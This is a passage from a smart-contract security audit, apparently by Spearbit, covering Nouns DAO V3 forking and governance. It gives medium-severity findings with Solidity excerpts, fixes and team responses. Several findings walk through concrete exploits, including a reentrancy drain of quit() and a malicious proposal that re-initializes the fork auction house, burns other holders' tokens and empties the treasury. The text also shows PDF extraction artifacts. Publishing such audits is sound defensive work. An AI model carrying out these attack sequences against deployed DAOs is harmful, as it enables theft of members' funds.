claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } In this situation both quorum and proposal thresholds will be zero, proposals can be created with creationBlock = block.number, at which only recently joined holder have voting power: • NounsDAOLogicV1Fork.sol#L242-L305 function propose( address[] memory targets, uint256[] memory values, string[] memory signatures, bytes[] memory calldatas, string memory description ) public returns (uint256) { checkGovernanceActive(); ProposalTemp memory temp; temp.totalSupply = adjustedTotalSupply(); >> temp.proposalThreshold = bps2Uint(proposalThresholdBPS, temp.totalSupply); require( nouns.getPriorVotes(msg.sender, block.number - 1) > temp.proposalThreshold, 'NounsDAO::propose: proposer votes below proposal threshold' ); ... newProposal.proposalThreshold = temp.proposalThreshold; newProposal.quorumVotes = bps2Uint(quorumVotesBPS, temp.totalSupply); ... newProposal.creationBlock = block.number; >> >> >> 10 • DeployDAOV3NewContractsBase.s.sol#L18-L23 contract DeployDAOV3NewContractsBase is Script { ... uint256 public constant FORK_DAO_PROPOSAL_THRESHOLD_BPS = 25; // 0.25% uint256 public constant FORK_DAO_QUORUM_VOTES_BPS = 1000; // 10% This will give the first joiner the full power over all the later joiners: • NounsDAOLogicV1Fork.sol#L577-L589 function castVoteInternal( address voter, uint256 proposalId, uint8 support ) internal returns (uint96) { ... /// @notice: Unlike GovernerBravo, votes are considered from the block the proposal was created >> in order to normalize quorumVotes and proposalThreshold metrics ,! uint96 votes = nouns.getPriorVotes(voter, proposal.creationBlock); Say if Bob, the original nouns DAO holder with 1 noun, joined when total supply was zero, he can create proposals and with regard for these proposals his only vote will be 100% of the DAO voting power. Bob can create a proposal to transfer all the funds to himself or a hidden malicious one like shown in Fork escrowers can exploit the fork or force late joiners to quit step 6. All the later joiners will not be able to stop this proposal, no matter how big their voting power be, as votes will be counted as on block where Bob had 100% of the votes. As the scenario above is a part of expected workflow (i.e. all fork initiators can be reasonably expected to quit fast enough), the probability of it is medium, while the probability of inattentive late joiners being exploited by Bob's proposal is medium too (there is not much time to react and some holders might first of all want to explore new fork functionality), so overall probability is low, while the impact is full loss of funds for such joiners. Per low combined likelihood and high impact setting the severity to be medium. Recommendation: In order to achieve stability forked DAO needs to secure enough members first, so, as one of the options, fork period might be required to be concluded prior to any proposals can be made in the new DAO. For this end consider additionally passing the forkingPeriodEndTimestamp to forked DAO (now it is only passed to the forked token), and forbidding new proposals until forkingPeriodEndTimestamp, for example: • NounsDAOStorageV1Fork.sol#L51-L54) /// @notice The latest proposal for each proposer mapping(address => uint256) public latestProposalIds; uint256 public delayedGovernanceExpirationTimestamp; + ,! + /// @notice The forking period expiration timestamp, after which new tokens cannot be claimed by the original DAO uint256 public forkingPeriodEndTimestamp; • NounsDAOLogicV1Fork.sol#L164-L193 11 function initialize( address timelock_, address nouns_, uint256 votingPeriod_, uint256 votingDelay_, uint256 proposalThresholdBPS_, uint256 quorumVotesBPS_, address[] memory erc20TokensToIncludeInQuit_, uint256 delayedGovernanceExpirationTimestamp_, uint256 forkingPeriodEndTimestamp_ ) public virtual { __ReentrancyGuard_init_unchained(); ... delayedGovernanceExpirationTimestamp = delayedGovernanceExpirationTimestamp_; forkingPeriodEndTimestamp = forkingPeriodEndTimestamp_; } • NounsDAOLogicV1Fork.sol#L107 error WaitingForTokensToClaimOrExpiration(); error WaitingForForkPeriodEnd(); • NounsDAOLogicV1Fork.sol#L242-L249) function propose( address[] memory targets, uint256[] memory values, string[] memory signatures, bytes[] memory calldatas, string memory description ) public returns (uint256) { checkGovernanceActive(); if (block.timestamp <= forkingPeriodEndTimestamp) { revert WaitingForForkPeriodEnd(); } + + + + + + Nouns: Fix implementation: nounsDAO/nouns-monorepo#717. Spearbit: The fix looks good. +5.2.2 Duplicate ERC20 tokens will send a greater than prorata token share leading to loss of DAO funds Severity: Medium Risk Context: NounsDAOV3Admin.sol#L497-L507 NounsDAOV3Fork.sol#L224-L230 NounsDAOLogicV1Fork.sol#L717- L721 NounsDAOLogicV1Fork.sol#L210-L215 Description: _setErc20TokensToIncludeInFork() is an admin function for setting ERC20 tokens that are used when splitting funds to a fork. However, there are no sanity checks for duplicate ERC20 tokens in the erc20tokens parameter. While STETH is the only ERC20 token applicable for now, it is conceivable that DAO treasury may include others in future. The same argument applies to _setErc20TokensToIncludeInQuit() and members quitting from the fork DAO. Duplicate tokens in the array will send a greater than prorata share of those tokens to the fork DAO treasury in sendProRataTreasury() or to the quitting member in quit(). This will lead to loss of funds for the original DAO and fork DAO respectively. Low likelihood + High impact = Medium severity. 12 Recommendation: Consider adding a check to filter out any duplicates in the setters or in sendProRataTrea- sury()/quit(). Nouns: Fix PR: PR 733. Spearbit: Verified that PR 733 fixes this issue as recommended using checks in setters. +5.2.3 A malicious proposer can create arbitrary number of maliciously updatable proposals to signifi- cantly grief the protocol Severity: Medium Risk Context: NounsDAOV3Proposals.sol#L783-L798 NounsDAOV3Proposals.sol#L171 NounsDAOV3Proposals.sol#L818- L823 NounsDAOV3Proposals.sol#L269-L423 Description: checkNoActiveProp() is documented as: "This is a spam protection mechanism to limit the num- ber of proposals each noun can back." However, this mitigation applies to proposer addresses holding Nouns but not the Nouns themselves because checkNoActiveProp() relies on checking the state of proposals tracked by proposer via latestProposalId = ds.latestProposalIds[proposer]. A malicious proposer can move (trans- fer/delegate) their Noun(s) to different addresses for circumventing this mitigation and create proposals from those new addresses to spam. Furthermore, proposal updation in the protocol does not check for the proposer meeting any voting power threshold at the time of updation. A malicious proposer can create arbitrary number of proposals, each from a different address by transferring/delegating their Nouns, and then update any/all of them to be malicious. Substantial effort will be required to differentiate all such proposals from the authentic ones and then cancel them, leading to DAO governance DoS griefing. Medium likelihood + Medium impact = Medium severity. Recommendation: Consider: 1. A redesign where proposal creation spam mitigation is not based on the Noun controlling address but the Noun itself. 2. Adding proposal threshold check for voting power during updation. Nouns: Won't Fix. This is a known issue from the launch of Nouns, and is mitigated by canceling proposals once proposer doesn’t have enough balance to meet threshold, as well as the vetoer in extreme cases. Such spammy behavior should easily become suspicious and token holders will be ready to cancel all such proposals, same as they are today. Specifically, when it comes to obvious spamming, we don’t think the updatable proposals adds any meaningful risk. The spammy behavior is the main red flag and using this new feature with more stealth is already discussed in "A malicious proposer can update proposal past inattentive voters to sneak in otherwise unacceptable details". Spearbit: Acknowledged. 13 +5.2.4 A malicious proposer can update proposal past inattentive voters to sneak in otherwise unaccept- able details Severity: Medium Risk Context: NounsDAOV3Proposals.sol#L269-L423 NounsDAOV3Admin.sol#L118 NounsDAOV3Votes.sol#L70- L293 Description: Updatable proposal description and transactions is a new feature being introduced in V3 to improve the UX of the proposal flow to allow proposal editing on-chain. The motivation for this feature as described in the spec is: "Proposals get voter feedback almost entirely only once they are on-chain. At the same time, proposers are relunctant to cancel and resubmit their proposals for multiple reasons, e.g. prefering to avoid restarting the proposal lifecycle and thus delay funding." However, votes are bound only to the proposal identifier and not to their description (which describes the motiva- tion/intention/usage etc.) or the transactions (values transferred, contracts/functions of interaction etc.). Inattentive voters may (decide to) cast their votes based on a stale proposal's description/transactions which could since have been updated. For example, someone voting Yes on the initial proposal version may vote No if they see the updated details. A very small voting delay (MIN_VOTING_DELAY is 1 block) may even allow a malicious proposer to sneak in a malicious update at the very end of the updatable period so that voters do not see it on time to change their votes being cast. Delays in front-ends updating the proposal details may contribute to this scenario. A malicious proposer updates proposal with otherwise unacceptable txs/description to get support of inattentive voters who cast their votes based on acceptable older proposal versions. Malicious proposal passes to transfer a significant amount of treasury to unauthorized receivers for unacceptable reasons. Low likelihood + High impact = Medium severity. Recommendation: Increase minimum threshold for voting delay to a reasonable value much greater than the current 1 block (12 seconds) e.g. few days which always (i.e. even assuming that DAO can change voting delay to any allowed value) gives sufficient time for voters to notice/evaluate updated proposal details after updatable period ends and voting period is active. A more defensive design is to make the votes binding on proposal description+transactions instead of only the proposal identifier. Nouns: Won't Fix. We think it highly unlikely the DAO will set voting delay to be very short. The DAO enjoys a multi-day period it uses to make sense of proposals. Spearbit: Acknowledged. +5.2.5 NounsDAOLogicV1Fork's quit() performing external calls in-between total supply and balance reads can allow for treasury funds stealing via cross-contract reentrancy Severity: Medium Risk Context: NounsDAOLogicV1Fork.sol#L201-L222 Description: Let's suppose there is an initiative group of nouns holders that performed fork, claimed is block.timestamp < and immediately quitted (say for pure financial Right after forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in original DAO contract, while NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() doesn't revert in the forked DAO contract, which have no material holdings. reasons). that it For simplicity let's say there is Bob and Alice, both aren't part of this group and still are in the original DAO, Bob have 2 nouns, Alice have 1, each nouns' share of treasury is 1 stETH and 100 ETH, erc20TokensToIncludeInQuit = [stETH]. All the above are going concern assumptions (a part of expected workflow), let's now have a low probability one: stETH contract was upgraded and now performs _beforetokentransfer() callback on every transfer to a destination address as long as it's a contract (i.e. it has a callback, for simplicity let's assume it behaves similarly 14 to ERC-721 safeTransfer). enough technical reason for such an upgrade. It doesn't make it malicious or breaks IERC20, let's just suppose there is a strong If Alice now decides to join this fork, Bob can steal from her: 1. Alice calls NounsDAOV3's joinFork(), 1 stETH and 100 ETH is transferred to NounsDAOLogicV1Fork: • NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { if (!isForkPeriodActive(ds)) revert ForkPeriodNotActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; address timelock = address(ds.timelock); sendProRataTreasury(ds, ds.forkDAOTreasury, tokenIds.length, adjustedTotalSupply(ds)); for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } Alice is minted 1 forked noun: • NounsTokenFork.sol#L166-L174) function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } 2. Bob transfers all to attack contract (cBob), that joins the DAO with 1 noun. Forked treasury is 2 stETH and 200 ETH, cBob and Alice both have 1 noun. 3. cBob calls quit() and reenters NounsDAOV3's joinFork() on stETH _beforetokentransfer() (and nothing else): • NounsDAOLogicV1Fork.sol#L201-L222 15 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); >> } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 4. cBob have joined fork with another noun, stETH transfer concludes. Forked treasury is 2 stETH and 300 ETH, while 1 stETH was just sent to cBob. 5. With quit() resumed, (address(timelock).balance * tokenIds.length) / totalSupply = (300 * 1) / 2 = 150 ETH is sent to cBob: • NounsDAOLogicV1Fork.sol#L201-L222 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } >> uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 6. Forked treasury is 2 stETH and 150 ETH, cBob calls quit() again without reentering (say on zero original nouns balance condition), obtains 1 stETH and 75 ETH, the same is left for Alice. Bob stole 25 ETH from Alice. 16 Attacking function logic can be as simple as {quit() as long as there is forkedNoun on my balance, perform joinFork() on the callback as long as there is noun on my balance}. Alice lost a part of treasury funds. The scale of the steps above can be increased to drain more significant value in absolute terms. Per low likelihood and high principal funds loss impact setting the severity to be medium. Recommendation: Core issue is that state variables, nouns total supply and treasury asset balances, are ob- tained before and after the external calls. This can be fixed by gathering the state beforehand, for example: • NounsDAOLogicV1Fork.sol#L201-L222 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); uint256 erc20length = erc20TokensToIncludeInQuit.length; uint256[] memory balances = new uint256[](erc20length + 1); IERC20[] memory erc20tokens = new IERC20[](erc20length); for (uint256 i = 0; i < erc20length; i++) { erc20tokens[i] = IERC20(erc20TokensToIncludeInQuit[i]); balances[i] = erc20tokens[i].balanceOf(address(timelock)); } balances[erc20length] = address(timelock).balance; for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { for (uint256 i = 0; i < erc20length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); uint256 tokensToSend = (balances[i] * tokenIds.length) / totalSupply; bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20tokens[i]), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; uint256 ethToSend = (balances[erc20length] * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); + + + + + + + + - + - - ,! - + + - + emit Quit(msg.sender, tokenIds); } Nouns: Fixed in PR 722. Spearbit: Fix looks good. 17 +5.2.6 A malicious DAO can mint arbitrary fork DAO tokens Severity: Medium Risk Context: NounsDAOV3Proposals.sol#L495 NounsDAOV3Fork.sol#L203-L205 NounsTokenFork.sol#L166-L174 Description: The original DAO is assumed to be honest during the fork period which is reinforced in the protocol by preventing it from executing any malicious proposals during that time. Fork joiners are minted fork DAO tokens by the original DAO via claimDuringForkPeriod() which enforces the fork period on the fork DAO side. However, the notion of fork period is different on the fork DAO compared to the original DAO (as described in Issue 16), i.e. while original DAO excludes forkEndTimestamp from the fork period, fork DAO includes forkingPeriodEndTimestamp in its notion of the fork period. If the original DAO executes a malicious proposal exactly in the block at forkEndTimestamp which makes a call to claimDuringForkPeriod() to mint arbitrary fork DAO tokens then the proposal will succeed on the original DAO side because it is one block beyond its notion of fork period. The claimDuringForkPeriod() will succeed on the fork DAO side because it is in the last block in its notion of fork period. The original DAO therefore can successfully mint arbitrary fork DAO tokens which can be used to: 1) brick the fork DAO when those tokens are attempted to be minted via auctions later or 2) manipulate the fork DAO governance to steal its treasury funds. In PoS, blocks are exactly 12 seconds apart. With forkEndTimestamp = block.timestamp + ds.forkPeriod; and ds.forkPeriod now set to 7 days, forkEndTimestamp is exactly 50400 blocks (7*24*60*60/12) after the block in which executeFork() was executed. A malicious DAO can coordinate to execute such a proposal exactly in that block. Low likelihood + High impact = Medium severity. Recommendation: Make the treatment of fork period consistent between the original and fork DAOs in: • NounsTokenFork.sol#L166-L174) function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { - + if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); if (block.timestamp >= forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } Nouns: Implemented fix: nounsDAO/nouns-monorepo#719. Spearbit: Verified that PR 719 fixes the issue as recommended. +5.2.7 Inattentive fork escrowers may lose funds to fork quitters Severity: Medium Risk Context: NounsDAOLogicV1Fork.sol#L201-L222 Fork-Spec NounsTokenFork.sol#L148-L157 NounsDAOLogicV1Fork.sol#L346-L349 Description: Fork escrowers already have their original DAO treasury pro rate funds transferred to the fork DAO treasury (when fork executes) and are expected to claimFromEscrow() after fork executes to mint their fork DAO tokens and thereby lay claim on their pro rata share of fork DAO treasury for governance or exiting. Inattentive fork escrowers who fail to do so will force a delayed governance of 30 days (currently proposed value) on the fork DAO and beyond that will allow fork DAO members to quit with a greater share of the fork DAO treasury because fork execution transfers all escrowers' original DAO treasury funds to fork DAO treasury. 18 Inattentive slow-/non-claiming fork escrowers may lose funds to quitters if they do not claim their fork DAO tokens before its governance is active in 30 days after fork executes. They will also be unaccounted for in DAO functions like quorum and proposal threshold. While we would expect fork escrowers to be attentive and claim their fork DAO tokens well within the delayed governance period, the protocol design can be more defensive of slow-/non-claimers by protecting their funds on the fork DAO from quitters. Low likelihood + High impact = Medium severity. Consider be Recommendation: nouns.totalSupply() - nouns.balanceOf(address(timelock)) + nouns.remainingTokensToClaim() which will include any unclaimed tokens in fork DAO calculations. This will effectively freeze the slow-/non-claiming fork escrowers' funds within the fork DAO treasury instead of them losing it to quitters (outside of any executed proposals acting on treasury funds) if they do not claim within 30 days. NounsDAOLogicV1Fork.adjustedTotalSupply() changing to Non-claimers will permanently affect the fork DAO supply which affects proposals/quitting but that is valid because unclaimed original DAO escrowed tokens have a perpetual 1:1 right on equivalent fork DAO tokens which should be accounted for correctly. Nouns: Acknowledged, and here's a fix PR: nounsDAO/nouns-monorepo#723. Spearbit: Verified that PR 723 fixes the issue as recommended. +5.2.8 Upgrading timelock without transferring the nouns from old timelock balance will increase adjusted total supply Severity: Medium Risk Context: ProposeTimelockMigrationCleanupMainnet.s.sol#L94 Description: There is one noun on timelock V1 balance, and can be others as of migration time: • etherscan.io/token/0x9c8ff314c9bc7f6e59a9d9225fb22946427edc03?a=0x0BC3807Ec262cB779b38D65b38158acC3bfedE10 Changing ds.timelock without nouns transfer will increase adjusted total supply: • NounsDAOV3Fork.sol#L199-L201 function adjustedTotalSupply(NounsDAOStorageV3.StorageV3 storage ds) internal view returns (uint256) { return ds.nouns.totalSupply() - ds.nouns.balanceOf(address(ds.timelock)) - ,! ds.forkEscrow.numTokensOwnedByDAO(); ,! } As of time of this writing adjustedTotalSupply() will be increased by 1 due to treasury token reclassification, the upgrade will cause a (13470 + 14968) * 1733.0 * (1 / 742 - 1 / 743) = 89 USD loss per noun or (13470 + 14968) * 1733.0 / 743 = 66330 USD cumulatively for all nouns holders. Per high likelihood and low impact setting the severity to be medium. Recommendation: Consider adding to ProposeTimelockMigrationCleanupMainnet the step of moving the trea- sury nouns from timelock V1 to timelock V2 contract to keep adjustedTotalSupply() reading unchanged. Nouns: Fixed in PR 721. Spearbit: Fix looks okay. Conditional on that timelockV1 owns no other nouns besides 687 as of time of the upgrade. 19 +5.2.9 Fork escrowers can exploit the fork or force late joiners to quit Severity: Medium Risk Context: NounsDAOLogicV1Fork.sol#L347 Description: Based in the current supply of Nouns and the following parameters that will be used during the upgrade to V3: • Nouns total supply: 743 • forkThresholdBPS_: 2000 (20%) • forkThreshold: 148, hence 149 Nouns need to be escrowed to be able to call executeFork() The following attack vector would be possible: 1. Attacker escrows 75 tokens. 2. Bob escrows 74 tokens to reach the forkThreshold. 3. Bob calls executeFork() and claimFromEscrow(). 4. Attacker calls claimFromEscrow() right away. As now nouns.remainingTokensToClaim() is zero the gover- nance is now active and proposals can be created. 5. Attacker creates a malicious proposal. Currently the attacker has 75 Nouns and Bob 74 in the fork. This means that the attacker has the majority of the voting power and whatever he proposes can not be denied. • NounsForkToken.getPriorVotes(attacker, ) -> 75 • NounsForkToken.getPriorVotes(Bob , ) -> 74 6. The proposal is created with the following description: "Proposal created to upgrade the NounsAuction- HouseFork to a new implementation similar to the main NounsAuctionHouse". The attacker deploys this new implementation and simply performs the following change in the code: modifier initializer() { - + require(_initializing || !_initialized, "Initializable: contract is already initialized"); require(!_initializing || _initialized, "Initializable: contract is already initialized"); bool isTopLevelCall = !_initializing; if (isTopLevelCall) { _initializing = true; _initialized = true; } _; if (isTopLevelCall) { _initializing = false; } } The proposal is created with the following data: targets[0] = address(contract_NounsAuctionHouseFork); values[0] = 0; signatures[0] = 'upgradeTo(address)'; calldatas[0] = abi.encode(address(contract_NounsAuctionHouseForkExploitableV1)); 7. Proposal is created and is now in Pending state. During the next days, users keep joining the fork increasing the funds of the fork treasury as the fork period is still active. 8. 5 days later proposal is in Active state and the attacker votes to pass it. Bob, who does not like the proposal, votes to reject it. 20 • quorumVotes: 14 • forVotes: 75 • againstVotes: 74 9. As the attacker and Bob were the only users that had any voting power at the time of proposal creation, five days later, the proposal is successful. 10. Proposal is queued. 11. 3 weeks later proposal is executed. 12. The NounsAuctionHouseFork contract is upgraded to the malicious version and the attacker re-initialize it and sets himself as the owner: contract_NounsAuctionHouseFork.initialize(attacker, NounsForkToken, , 0, 0, 0, 0) 13. Attacker, who is now the owner, upgrades the NounsAuctionHouseFork contract, once again, to a new im- plementation that implements the following function: function burn(uint256[] memory _nounIDs) external onlyOwner{ for (uint256 i; i < _nounIDs.length; ++i){ nouns.burn(_nounIDs[i]); } } 14. Attacker now, burns all the Nouns Tokens in the fork except the ones that he owns. 15. Attacker calls quit() draining the whole treasury: NounsTokenFork.totalSupply() -> 75 attacker.balance -> 0 contract_stETH.balanceOf(attacker) -> 0 forkTreasury.balance -> 2005_383580080753701211 contract_stETH.balanceOf(forkTreasury) -> 2005_383580080753701210 attacker calls -> contract_NounsDAOLogicV1Fork.quit([0, ... 74]) attacker.balance -> 2005_383580080753701211 contract_stETH.balanceOf(attacker) -> 2005_383580080753701208 forkTreasury.balance -> 0 contract_stETH.balanceOf(forkTreasury) -> 1 Basically, the condition that should be met for this exploit is that at the time of proposal creation the attacker has If this happens, users will be more than 51% of the voting power. This is more likely to happen in small forks. forced to leave or be exploited. As there is no vetoer role, noone will be able to stop this type of proposals. Recommendation: Consider removing the checkGovernanceActive() function and, instead, do not allow users to create any proposal in the fork until the fork period is not active anymore or which is the same: isForkPerio- dActive == false. Consider also auditing any new proposal that is added to the DAO to mitigate these risks. Nouns: Followed Spearbit's recommendation and fixed the issue in the PR 717. Proposals can not be created and users can not quit the fork until the forking period is over. Spearbit: Acknowledged. 21 +5.2.10 Including non-standard ERC20 tokens will revert and prevent forking/quitting Severity: Medium Risk Context: NounsDAOExecutorV2.sol#L223, NounsDAOV3Fork.sol#L228-L229, NounsDAOLogicV1Fork.sol#L213- L214 Description: If erc20TokensToIncludeInFork or erc20TokensToIncludeInQuit accidentally/maliciously include non-confirming ERC20 tokens, such as USDT, which do not return a boolean value on transfers then sendProRata- Treasury() and quit() will revert because it expects timelock.sendERC20() to return true from the underlying ERC20 transfer call. The use of transfer() instead of safeTransfer() allows this scenario. Low likelihood + High impact = Medium severity. Inclusion of USDT-like tokens in protocol will revert sendProRataTreasury() and quit() to prevent forking/quitting. Recommendation: Consider the use of safeTransfer() instead of transfer() in sendERC20() and remove the check in callers on the expected boolean return value. Nouns: Acknowledged. Fixed in this PR 720. Spearbit: Verified that PR 720 fixes the issue as recommended. +5.2.11 Changing voteSnapshotBlockSwitchProposalId after it was set allows for votes double counting Severity: Medium Risk Context: NounsDAOV3Admin.sol#L472-L482 Description: Now ds.voteSnapshotBlockSwitchProposalId can be changed after it was once set to the next proposal id, there are no restrictions on repetitive setting. In the same time, proposal votes are counted without saving the additional information needed to reconstruct the timing and voteSnapshotBlockSwitchProposalId moved forward as a result of such second _setVoteSnap- shotBlockSwitchProposalId() call will produce a situation when all the older, already cast, votes for the propos- als with old_voteSnapshotBlockSwitchProposalId <= id < new_voteSnapshotBlockSwitchProposalId will be counted as of proposal.startBlock, while all the never, still to be casted, votes for the very same proposals will be counted as of proposal.creationBlock. Since the voting power of users can vary in-between these timestamps, this will violate the equality of voting conditions for all such proposals. Double counting will be possible and total votes greater than total supply can be cast this way: say Bob has transferred his nouns to Alice between proposal.startBlock and pro- posal.creationBlock, Alice voted before the change, Bob voted after the change. Bob's nounces will be counted twice. Severity is medium: impact looks to be high, a violation of equal foot voting paves a way for voting manipulations, but there is a low likelihood prerequisite of passing a proposal for the second update for the voteSnapshotBlock- SwitchProposalId. The latter can happen as a part of bigger pack of changes. _setVoteSnapshotBlockSwitch- ProposalId() call do not have arguments and by itself repeating it doesn't look incorrect. Recommendation: Consider controlling the one time switch nature of this parameter directly in the code, for example: • NounsDAOV3Admin.sol#L34-L35 error InvalidProposalUpdatablePeriodInBlocks(); error VoteSnapshotSwitchAlreadySet(); + • NounsDAOV3Admin.sol#L472-L482 22 - + + + + function _setVoteSnapshotBlockSwitchProposalId(NounsDAOStorageV3.StorageV3 storage ds) external ,! onlyAdmin(ds) { uint256 newVoteSnapshotBlockSwitchProposalId = ds.proposalCount + 1; uint256 oldVoteSnapshotBlockSwitchProposalId = ds.voteSnapshotBlockSwitchProposalId; if (oldVoteSnapshotBlockSwitchProposalId > 0) { revert VoteSnapshotSwitchAlreadySet(); } uint256 newVoteSnapshotBlockSwitchProposalId = ds.proposalCount + 1; ds.voteSnapshotBlockSwitchProposalId = newVoteSnapshotBlockSwitchProposalId; emit VoteSnapshotBlockSwitchProposalIdSet( oldVoteSnapshotBlockSwitchProposalId, newVoteSnapshotBlockSwitchProposalId ); } Nouns: Implemented recommendation: PR 718. Spearbit: Fix looks good. +5.2.12 Key fork parameters are set outside of proposal flow, while aren't being controlled in the code Severity: Medium Risk Context: ForkDAODeployer.sol#L31-L81 Description: These configuration parameters are crucial for fork workflow and new DAO logic, but aren't checked when being set in ForkDAODeployer's constructor: • ForkDAODeployer.sol#L31-L81 contract ForkDAODeployer is IForkDAODeployer { ... constructor( address tokenImpl_, address auctionImpl_, address governorImpl_, address treasuryImpl_, uint256 delayedGovernanceMaxDuration_, uint256 initialVotingPeriod_, uint256 initialVotingDelay_, uint256 initialProposalThresholdBPS_, uint256 initialQuorumVotesBPS_ ) { } ... delayedGovernanceMaxDuration = delayedGovernanceMaxDuration_; initialVotingPeriod = initialVotingPeriod_; initialVotingDelay = initialVotingDelay_; initialProposalThresholdBPS = initialProposalThresholdBPS_; initialQuorumVotesBPS = initialQuorumVotesBPS_; While most parameters are set via proposals directly and are controlled in the corresponding setters, these 5 variables are defined only once on ForkDAODeployer construction and neither per se visible in proposals, as ForkDAODeployer is being set as an address there, nor being controlled within the corresponding setters this way. Their values aren't controlled on construction either. 23 • NounsDAOLogicV3.sol#L820-L840 /** * @notice Admin function for setting the fork related parameters * @param forkEscrow_ the fork escrow contract * @param forkDAODeployer_ the fork dao deployer contract * @param erc20TokensToIncludeInFork_ the ERC20 tokens used when splitting funds to a fork * @param forkPeriod_ the period during which it's possible to join a fork after exeuction * @param forkThresholdBPS_ the threshold required of escrowed nouns in order to execute a fork */ function _setForkParams( address forkEscrow_, address forkDAODeployer_, address[] calldata erc20TokensToIncludeInFork_, uint256 forkPeriod_, uint256 forkThresholdBPS_ ) external { ds._setForkEscrow(forkEscrow_); ds._setForkDAODeployer(forkDAODeployer_); ds._setErc20TokensToIncludeInFork(erc20TokensToIncludeInFork_); ds._setForkPeriod(forkPeriod_); ds._setForkThresholdBPS(forkThresholdBPS_); } • NounsDAOV3Admin.sol#L484-L495 /** * @notice Admin function for setting the fork DAO deployer contract */ function _setForkDAODeployer(NounsDAOStorageV3.StorageV3 storage ds, address newForkDAODeployer) external onlyAdmin(ds) address oldForkDAODeployer = address(ds.forkDAODeployer); ds.forkDAODeployer = IForkDAODeployer(newForkDAODeployer); emit ForkDAODeployerSet(oldForkDAODeployer, newForkDAODeployer); { } Impact: an setting example, delayedGovernanceMaxDuration = 0 As bypasses NounsDAOLogicV1Fork's checkGovernanceActive() control and allows for stealing the whole treasury of a new forked DAO with executeFork() NounsTokenFork.claimFromEscrow() -> NounsDAOLogicV1Fork.quit() deployment transaction. An attacker will be entitled to 1 / 1 = 100% of the new DAO funds being the only one who claimed. back-running call Setting medium severity per low likelihood and high impact of misconfiguration, which can happen both as an operational mistake or be driven by a malicious intent. Recommendation: Consider controlling delayedGovernanceMaxDuration, initialVotingPeriod, initialVot- ingDelay, initialProposalThresholdBPS, initialQuorumVotesBPS in the constructor to be within the hard- coded boundary values. Slight increase of size and gas cost is well justified in this setting. Nouns: Acknowledged, won't fix. We disagree with the risk assessment, and like the freedom the current approach affords us. Why we think it's low risk: These parameters are actually easy to review in any proposal that sets a fork deployer, since the implementation is available onchain with these parameters set. Spearbit: Acknowledged. 24 +5.2.13 A malicious DAO can hold token holders captive by setting forkPeriod to an unreasonably low value Severity: Medium Risk Context: NounsDAOV3Admin.sol#L516-L524 Description: A malicious majority can reduce the number of Noun holders joining an executed fork by setting the forkPeriod to an unreasonably low value, e.g. 0, because there is no 